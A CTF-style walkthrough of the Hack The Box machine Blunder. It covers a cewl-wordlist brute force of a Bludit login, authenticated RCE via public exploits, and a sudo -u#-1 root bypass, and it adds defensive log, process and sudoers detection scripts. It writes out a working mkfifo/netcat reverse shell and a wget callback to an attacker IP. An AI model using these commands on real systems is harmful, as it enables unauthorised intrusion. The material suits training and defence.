Follow along in my OSCP journey; this is my target 15 of TJNULL's OSCP list.
How to use this walkthrough?
To avoid the typical answer on a plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.
Let’s go!
Enumeration
I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.191
Autorecon
While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt.
PORT STATE SERVICE REASON VERSION
21/tcp closed ftp reset ttl 63
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
OK, so it seems like the path is quite straightforward, as there is only one service that's open.
Web — 80
First of all, the website just seems like a blog type template of interesting facts without many features to explore.
Nikto
Nikto is an old web scanner that is always good to run to get some quick info on the target. We get a lot of false positives with the admin page, but we find a potentially interesting file: .gitignore
It seems that there are some remains of a git repo, let's explore.
We looked at those folders but found nothing of value in the end.
Let’s explore with a tool specialised in directory busting, gobuster.
gobuster dir -u http://10.10.10.191/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/0 (Status: 200) [Size: 7561]
/LICENSE (Status: 200) [Size: 1083]
/about (Status: 200) [Size: 3280]
/admin (Status: 301) [Size: 0]
/cgi-bin/ (Status: 301) [Size: 0]
/install.php (Status: 200) [Size: 30]
/robots.txt (Status: 200) [Size: 22]
/server-status (Status: 403) [Size: 277]
/todo.txt (Status: 200) [Size: 118]
There are a couple of interesting filenames on that list:
- todo.txt:
  -Update the CMS
  -Turn off FTP - DONE
  -Remove old users - DONE
  -Inform fergus that the new blog needs images - PENDING
- install.php and /admin
This is the first time we actually read the name of the app that is installed, and we have a login page as well.
HINT
We've explored most of the application; what are the logical paths we can take with a login screen and the name of an app?
.
.
.
.
It's time for exploit research and possibly a login bypass or login bruteforce.
Based on the page source and the searchsploit research, it seems the Bludit version is 3.9.2.
The authentication followed by the file upload seems like a nice vector; let's look at our enumeration for a username.
We also looked for the credentials directly based on the documentation, but we didn't have access.
We also have the user found in the todo notes: fergus.
We tried the Python bruteforce script but couldn't fix the encoding issues, so we tried the Ruby option instead:
ruby 48746.rb -r http://10.10.10.191/admin/login.php -u fergus -w /usr/share/wordlists/rockyou.txt
But it doesn't seem to work.
HINT
Based on our current research, most exploits for Bludit require us to be authenticated; what other options than rockyou do we have?
.
.
.
.
That's right: we know what the owner loves, so let's create a custom wordlist with the topics he enjoys, using cewl.
# -d sets the crawl depth and -m the minimum word length
cewl -w customwordlist.txt -d 1 -m 7 http://10.10.10.191/0
Let’s run our bruteforce again with the new list:
ruby2.7 48746.rb -r http://10.10.10.191 -u fergus -w customwordlist.txt
Jackpot! Let's authenticate using fergus:RolandDeschain
We’re in!
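From the defender's side, the password guessing above leaves an obvious trace: a burst of POST requests to /admin/login.php from one source address in Apache's access log. The script below is an added example, not part of the original walkthrough, and runs over a handful of constructed combined-format log lines (the addresses, timestamps and user agents are made up); it parses each line and flags any client that posts to the login page at least `threshold` times inside a sliding window of `window_seconds`.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log (not captured from the original machine): one client
# hammers the Bludit login page, another logs in once and browses normally.
SAMPLE_LOG = """\
10.10.14.46 - - [21/Jun/2020:10:00:01 +0000] "GET / HTTP/1.1" 200 7561 "-" "Mozilla/5.0"
10.10.14.46 - - [21/Jun/2020:10:00:02 +0000] "POST /admin/login.php HTTP/1.1" 200 3280 "-" "Ruby"
10.10.14.46 - - [21/Jun/2020:10:00:02 +0000] "POST /admin/login.php HTTP/1.1" 200 3280 "-" "Ruby"
10.10.14.46 - - [21/Jun/2020:10:00:03 +0000] "POST /admin/login.php HTTP/1.1" 200 3280 "-" "Ruby"
10.10.14.46 - - [21/Jun/2020:10:00:03 +0000] "POST /admin/login.php HTTP/1.1" 200 3280 "-" "Ruby"
10.10.14.46 - - [21/Jun/2020:10:00:04 +0000] "POST /admin/login.php HTTP/1.1" 302 0 "-" "Ruby"
192.168.1.20 - - [21/Jun/2020:10:05:00 +0000] "POST /admin/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.20 - - [21/Jun/2020:11:00:00 +0000] "GET /admin/ HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
"""


def parse_log(text):
    """Return (ip, timestamp, method, path, status) tuples; unparsable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events.append((m["ip"], ts, m["method"], m["path"], int(m["status"])))
    return events


def find_login_bursts(events, login_path="/admin/login.php", threshold=5, window_seconds=60):
    """Map each client IP to the largest number of login POSTs it made within one window,
    keeping only clients that reach the threshold."""
    per_ip = defaultdict(list)
    for ip, ts, method, path, _status in events:
        if method == "POST" and path == login_path:
            per_ip[ip].append(ts)

    flagged = {}
    window = timedelta(seconds=window_seconds)
    for ip, times in per_ip.items():
        times.sort()
        best, start = 0, 0
        # Two-pointer sweep: [start, end] always spans at most `window` seconds.
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


if __name__ == "__main__":
    for ip, count in find_login_bursts(parse_log(SAMPLE_LOG)).items():
        print(f"{ip}: {count} login POSTs within the window")
```

The threshold here is deliberately low to make the sample visible; on a real site the same logic is what tools such as fail2ban implement, and rate-limiting the login endpoint removes the cewl-style wordlist attack regardless of how guessable the password is.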
Now that we're in, we realise there isn't much to explore inside the admin dashboard, so let's pivot to the other exploits. Reading the multiple/webapps/48701.txt exploit, we realise that we can actually get RCE, not only directory traversal. And reading the exploit for version 3.9.12 (php/webapps/48568.py), we realise we can use it as well.
searchsploit -x multiple/webapps/48701.txt
searchsploit -x php/webapps/48568.py
We try to run it, without much success initially:
python3 48568.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "id"
HINT
When we don't get any output from our RCE attempts, what is a nice way to confirm that something is happening on the machine?
.
.
.
.
We want to test for blind execution; a nice way to do so is to perform some action that we can witness from our machine, such as a request to a simple file web server we host, or a ping captured with tcpdump.
updog -p 80
python3 48568.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "wget http://10.10.14.46/test"
We confirm we have blind RCE ❤
Let's get a reverse shell.
# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
python3 48568.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.46 4444 >/tmp/f"
For some reason the exploit isn't super reliable; I had to run the same command a couple of times for it to work. We're in, baby!
Time for some shell upgrade 😉 We actually struggled to get a fully functional TTY shell, but thanks to this article we found a way: https://zweilosec.github.io/posts/upgrade-linux-shell/
1. In our Kali terminal, before creating our listener, we actually type 'bash'
2. which python python2 python3 (find out whether python2 or python3 is installed)
3. python -c 'import pty; pty.spawn("/bin/bash")'
4. Ctrl+Z
5. stty raw -echo
6. fg, Enter, Enter
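Both the wget callback and the mkfifo/nc reverse shell above share one property a defender can key on: the web server's service account spawns a shell and network tooling, which it never does while serving pages. The script below is an added example (not from the original post) that runs over a constructed process snapshot in a made-up "user parent comm cmdline" layout; the rules flag a shell whose parent is the web server process, and any download or netcat-style command line running under a web service account.

```python
import re

# Accounts that serve HTTP and should not be running shells or network tools.
WEB_USERS = {"www-data", "apache", "nginx"}
WEB_PARENTS = {"apache2", "php-fpm", "php", "nginx"}
SHELLS = {"sh", "bash", "dash"}

# Tokens that, under a web account, point to command execution rather than page serving.
SUSPICIOUS = re.compile(r"\b(mkfifo|nc|ncat|netcat|wget|curl|python3?|bash -i|sh -i)\b")

# Constructed snapshot (user parent_comm comm cmdline); assumed layout, not real ps output.
SNAPSHOT = """\
root systemd apache2 /usr/sbin/apache2 -k start
www-data apache2 apache2 /usr/sbin/apache2 -k start
www-data apache2 sh sh -c wget http://10.10.14.46/test
www-data apache2 sh sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.46 4444 >/tmp/f
www-data sh nc nc 10.10.14.46 4444
hugo bash vim vim notes.txt
"""


def parse_snapshot(text):
    """Split each line into (user, parent, comm, cmdline); cmdline keeps its spaces."""
    records = []
    for line in text.splitlines():
        parts = line.split(None, 3)
        if len(parts) == 4:
            records.append(tuple(parts))
    return records


def classify(record):
    """Return a reason string when the process looks like web-server command execution, else None."""
    user, parent, comm, cmdline = record
    if user not in WEB_USERS:
        return None
    if parent in WEB_PARENTS and comm in SHELLS:
        return "shell spawned directly by the web server process"
    if SUSPICIOUS.search(cmdline):
        return "network/download tool or interactive shell under the web account"
    return None


def find_suspicious(text):
    """Return [(cmdline, reason)] for every flagged process in the snapshot."""
    hits = []
    for record in parse_snapshot(text):
        reason = classify(record)
        if reason:
            hits.append((record[3], reason))
    return hits


if __name__ == "__main__":
    for cmdline, reason in find_suspicious(SNAPSHOT):
        print(f"[!] {reason}: {cmdline}")
```

In production the same rules are expressed as an auditd or EDR policy on execve with the parent image and effective user as conditions; the mitigation side is to deny the web account outbound connections and to keep the CMS patched, which is exactly the "Update the CMS" item still open in todo.txt.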
We are the www-data user, so we don't have a user flag yet; let's explore the application for a possible password.
We tried cracking the passwords unsuccessfully. Let's enumerate the users on the machine.
We look at /etc/passwd and /home, and we have 2 users: hugo and shaun.
Let's explore the usual locations for interesting files that www-data could have permission to read: /opt/ and /var/www.
It seems that the new version mentioned in the todo notes is ready, but the Apache config files haven't been updated yet; let's explore the same users file there.
Let's crack the password using crackstation.
Let's log in as hugo.
Let's get the user flag.
Getting Root
The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.
Quick Wins
sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with a DB password or even a user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)
OK, we get a hit immediately with sudo -l:
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
HINT
Does this mean we can just run sudo /bin/bash? Have you seen that !root capability before?
.
.
.
.
It seems we can run /bin/bash as any user but root; let's do some digging.
Let's open that up.
Let's give that a try. We fail, as it seems we need a TTY shell; let's get that and try again:
sudo -u#-1 /bin/bash
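The rule that made this possible, `(ALL, !root) /bin/bash`, is a pattern a sudoers audit can catch mechanically: a runas list of ALL with exclusions only expresses intent correctly on sudo builds that handle the -1 user id properly (the fix shipped in sudo 1.8.28, a fact not stated on the page), and an explicit list of permitted target users is the robust way to write it. The script below is an added example, not part of the original walkthrough; it parses the `sudo -l` output shown above (plus one constructed, benign rule for contrast) and reports every runas specification that combines ALL with a `!` exclusion.

```python
import re

# Runas specification as printed by "sudo -l": "(users[:groups]) commands".
# Assumption: the parenthesised runas list is the first thing on the rule line.
RUNAS_RE = re.compile(r"\((?P<users>[^):]+)(?::(?P<groups>[^)]*))?\)\s*(?P<cmds>.+)")

# The sudo -l output from the page, with one constructed extra rule for contrast.
SUDO_L_OUTPUT = """\
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
    (shaun) /usr/bin/systemctl status apache2
"""


def parse_runas_rules(text):
    """Return (runas_users, commands) for each rule line in sudo -l output."""
    rules = []
    for line in text.splitlines():
        m = RUNAS_RE.match(line.strip())
        if m:
            users = [u.strip() for u in m["users"].split(",")]
            rules.append((users, m["cmds"].strip()))
    return rules


def audit_rule(users, cmds):
    """Return a finding when the runas list is ALL minus exclusions, else None."""
    negated = [u for u in users if u.startswith("!")]
    if "ALL" in users and negated:
        return (
            f"runas ({', '.join(users)}) for '{cmds}': ALL with exclusions {negated}; "
            "on unpatched sudo a user id of -1 bypasses the exclusion, so list the "
            "permitted target users explicitly instead"
        )
    return None


def audit_sudo_l(text):
    """Run audit_rule over every parsed rule and return the list of findings."""
    findings = []
    for users, cmds in parse_runas_rules(text):
        finding = audit_rule(users, cmds)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_l(SUDO_L_OUTPUT):
        print("[!]", finding)
```

The same check can be pointed at /etc/sudoers and /etc/sudoers.d/* directly, since the runas syntax is identical there; in either case the fix is to replace `(ALL, !root)` with the users hugo actually needs, and to keep sudo itself current.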
What did I learn?
- How to go through exploits, read them and understand how to use them properly.
- How to create a fully usable TTY shell, as the last part of the machine requires it to work.
Stream
I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.